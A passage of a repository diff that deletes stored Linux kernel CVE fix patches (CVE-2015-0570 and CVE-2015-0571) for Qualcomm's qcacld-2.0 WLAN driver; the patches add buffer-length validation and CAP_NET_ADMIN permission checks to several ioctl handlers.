- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
- pos += length;
-@@ -4217,6 +4248,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- } // switch
- }
- halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
-+ if (halStatus != eHAL_STATUS_SUCCESS)
-+ ret = -EINVAL;
- pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
- if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
- {
-@@ -4225,10 +4258,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- WLANSAP_Update_WpsIe ( pVosContext );
- }
-
-+exit:
- vos_mem_free(pSap_WPSIe);
- kfree(fwps_genie);
- EXIT();
-- return halStatus;
-+ return ret;
- }
-
- static int iw_softap_setwpsie(struct net_device *dev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch
deleted file mode 100644
index ab87e188..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0570/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Tue, 27 Oct 2015 21:56:28 +0530
-Subject: qcacld 2.0: Validate ioctls for valid input length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-Change-Id: I01589f37996510ee130485ef43e1f36811692e28
-CRs-Fixed: 930542
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 61 +++++++++++++++++++++++++++++++----------
- 1 file changed, 47 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 881400e..e4e1a63 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -5186,9 +5186,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- case DOT11F_EID_WPA:
- if (wps_genie[1] < 2 + 4)
- {
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
- {
-@@ -5246,6 +5245,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT;
- pos += length;
-@@ -5260,9 +5264,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-
- default:
- hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- }
- }
-@@ -5274,9 +5277,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-
- default:
- hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return 0;
-+ ret = -EINVAL;
-+ goto exit;
- }
- 
}
- else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
-@@ -5288,9 +5290,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- case DOT11F_EID_WPA:
- if (wps_genie[1] < 2 + 4)
- {
-- vos_mem_free(pSap_WPSIe);
-- kfree(fwps_genie);
-- return -EINVAL;
-+ ret = -EINVAL;
-+ goto exit;
- }
- else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
- {
-@@ -5354,6 +5355,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
- pos += length;
-@@ -5363,6 +5369,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -5373,6 +5384,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -5382,6 +5398,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text))) 
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -5391,6 +5412,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -5414,6 +5440,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- pos += 2;
- length = *pos<<8 | *(pos+1);
- pos += 2;
-+ if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+ {
-+ ret = -EINVAL;
-+ goto exit;
-+ }
- pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
- vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
- pos += length;
-@@ -5450,6 +5481,8 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- #else
- halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
- #endif
-+ if (halStatus != eHAL_STATUS_SUCCESS)
-+ ret = -EINVAL;
- pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
- if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
- {
-@@ -5461,11 +5494,11 @@ static int __iw_softap_setwpsie(struct net_device *dev,
- WLANSAP_Update_WpsIe ( pVosContext );
- #endif
- }
--
-+exit:
- vos_mem_free(pSap_WPSIe);
- kfree(fwps_genie);
- EXIT();
-- return halStatus;
-+ return ret;
- }
-
- static int iw_softap_setwpsie(struct net_device *dev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch
deleted file mode 100644
index 27955d7c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 6feb2faf80a05940618aa2eef2b62e4e2e54f148 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:42:45 +0530
-Subject: wlan:Check priviledge permission before processing SET_OEM_DATA_REQ
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-Change-Id: Ida0133304b00627d01ef7f85f5b15ed9d404d443
-CRs-Fixed: 930549
----
- CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_oemdata.c b/CORE/HDD/src/wlan_hdd_oemdata.c
-index 17e3689..1aef257 100644
---- a/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -200,6 +200,12 @@ static int __iw_set_oem_data_req(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch
deleted file mode 100644
index ddf971b2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From fe4208157c899a5de4d6769d13f6620fc32ebfa9 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula
-Date: Thu, 29 Oct 2015 12:13:38 +0530
-Subject: wlan:Check priviledge permission for SET_CHANNEL_RANGE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHANNEL_RANGE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I48bcd55bee45203667bcc679db4ad96aa9e04b7c
-CRs-Fixed: 930555
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 270f5e1..c6cce50 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4231,6 +4231,12 @@ static int wlan_hdd_set_force_acs_ch_range(struct net_device *dev,
- hdd_context_t *hdd_ctx = WLAN_HDD_GET_CTX(adapter);
- int *value = (int *)extra;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if (wlan_hdd_validate_operation_channel(adapter, value[0]) !=
- VOS_STATUS_SUCCESS ||
- wlan_hdd_validate_operation_channel(adapter, value[1]) !=
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch
deleted file mode 100644
index 9b0fcfa9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0003.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 0e53a89bfe0dbb50e0dde9a6960d274386247cd9 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:17:10 +0530
-Subject: wlan:Check priviledge permission before processing SET_CHAR_GET_NONE
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-Change-Id: I7b060bcdc84f7016e8d301e994437a535533a260
-CRs-Fixed: 930935
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 668cd1d..610b61b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7216,6 +7216,12 @@ static int __iw_setchar_getnone(struct net_device *dev,
- if (0 != ret)
- return ret;
-
-+ if (!capable(CAP_NET_ADMIN)){
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- /* helper function to get iwreq_data with compat handling. */
- if (hdd_priv_get_data(&s_priv_data, wrqu)) {
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch
deleted file mode 100644
index 7fea03a5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0004.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 88ce639e7a0bba852f193b6f53b7ca1926a09b02 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:47:48 +0530
-Subject: wlan:Check priviledge permission before processing SET_PACKET_FILTER
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ib49c3223eacdc90dfe0d45af1aff7c74518990df
-CRs-Fixed: 930937
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 610b61b..67ed8a3 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10088,6 +10088,12 @@ static int __iw_set_packet_filter_params(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- hdd_ctx = WLAN_HDD_GET_CTX(pAdapter);
- ret = wlan_hdd_validate_context(hdd_ctx);
- if (0 != ret)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch
deleted file mode 100644
index d4a24982..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0005.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 0858d21caf17d56f8d2353590c1ec245073222e0 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:37:46 +0530
-Subject: wlan:Check priviledge permission for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-Change-Id: Icbdfe69c18c1ab3b75d63e046d5251307a794817
-CRs-Fixed: 930942
----
- CORE/HDD/src/wlan_hdd_wext.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 67ed8a3..27c1813 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8916,6 +8916,11 @@ static int iw_hdd_set_var_ints_getnone(struct net_device *dev,
- int apps_args[MAX_VAR_ARGS] = {0};
- int ret, num_args;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
- /* Helper function to get iwreq_data with compat handling. */
- if (hdd_priv_get_data(&u_priv_wrqu.data, wrqu))
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch
deleted file mode 100644
index 29bc5599..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0006.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 2905578424256be07e6b9d8c63bb83d40cc52a71 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Wed, 28 Oct 2015 00:26:02 +0530
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: Ie1c945afb0f109892beda66bab25647d70cc62d7
-CRs-Fixed: 930944
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index e4e1a63..52402ff 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -5130,6 +5130,12 @@ static int __iw_softap_setwpsie(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter);
- ret = wlan_hdd_validate_context(hdd_ctx);
- if (0 != ret)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch
deleted file mode 100644
index c02c77cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0007.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From be62ecde85228b91c66fb047e27d25132f56bd0d Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Wed, 28 Oct 2015 00:29:03 +0530
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I00919a56e93b8b49bce7a314b50f9f48039fbe6f
-CRs-Fixed: 930946
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 52402ff..9a96d5e 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4066,6 +4066,12 @@ static __iw_softap_disassoc_sta(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- hdd_ctx = WLAN_HDD_GET_CTX(pHostapdAdapter);
- ret = wlan_hdd_validate_context(hdd_ctx);
- if (0 != ret)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch
deleted file mode 100644
index 266962e0..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0008.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aaeeed43f9597631982835481c7cf2621f6455f0 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula
-Date: Wed, 28 Oct 2015 00:23:45 +0530
-Subject: wlan:Check priviledge permission for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-Change-Id: I3c695160d637ed87b04ccf3299985055a9791c4b
-CRs-Fixed: 930948
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index c1ba718..28a280b 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -7959,6 +7959,12 @@ static int __iw_set_three_ints_getnone(struct net_device *dev,
-
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- ret = wlan_hdd_validate_context(hdd_ctx);
- if (0 != ret)
- return ret;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch
deleted file mode 100644
index 1d9fd9b9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0009.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 6642bccf3ed8cba176dee7d4bbc21fc4580efb7b Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:51:02 +0530
-Subject: wlan:Check priviledge permission for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ie8a36bfa07a7b21601364b27b3c4bc888a6a5b4e
-CRs-Fixed: 930952
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 27c1813..3240c90 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10816,6 +10816,12 @@ static int __iw_set_band_config(struct net_device *dev,
- if (0 != ret)
- return ret;
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- return hdd_setBand(dev, value[0]);
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch
deleted file mode 100644
index 44684fad..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0010.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 6665a9697b404acf4d2e7d52d9c2b19512c9b239 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:56:37 +0530
-Subject: wlan:Check priviledge permission for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: Ie930c9723ecbd54ae0e6bf6506815301e0387932
-CRs-Fixed: 930953
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 3240c90..b7448c3 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -10846,6 +10846,12 @@ static int __iw_set_power_params_priv(struct net_device *dev,
- char *ptr;
-
- ENTER();
-+
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
- /* ODD number is used for set, copy data using copy_from_user */
- ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
- wrqu->data.length);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch b/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch
deleted file mode 100644
index e02a099e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-0571/qcacld-2.0/0011.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 9eeafd788f53cc37c169b299f91ca9c558b228f9 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Tue, 27 Oct 2015 23:54:05 +0530
-Subject: wlan:Check priviledge permission for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Change-Id: I9b50fcc0eeb1c1eb3493eab573f4421b52f0ea9a
-CRs-Fixed: 930954
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index b7448c3..c1ba718 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9458,6 +9458,12 @@ static int __iw_clear_dynamic_mcbc_filter(struct net_device *dev,
- tpSirWlanSetRxpFilters wlanRxpFilterParam;
-
- ENTER();
-+
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
- //Reset the filter to INI value as we have to clear the dynamic filter
- pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
-
---
-cgit v1.1
-
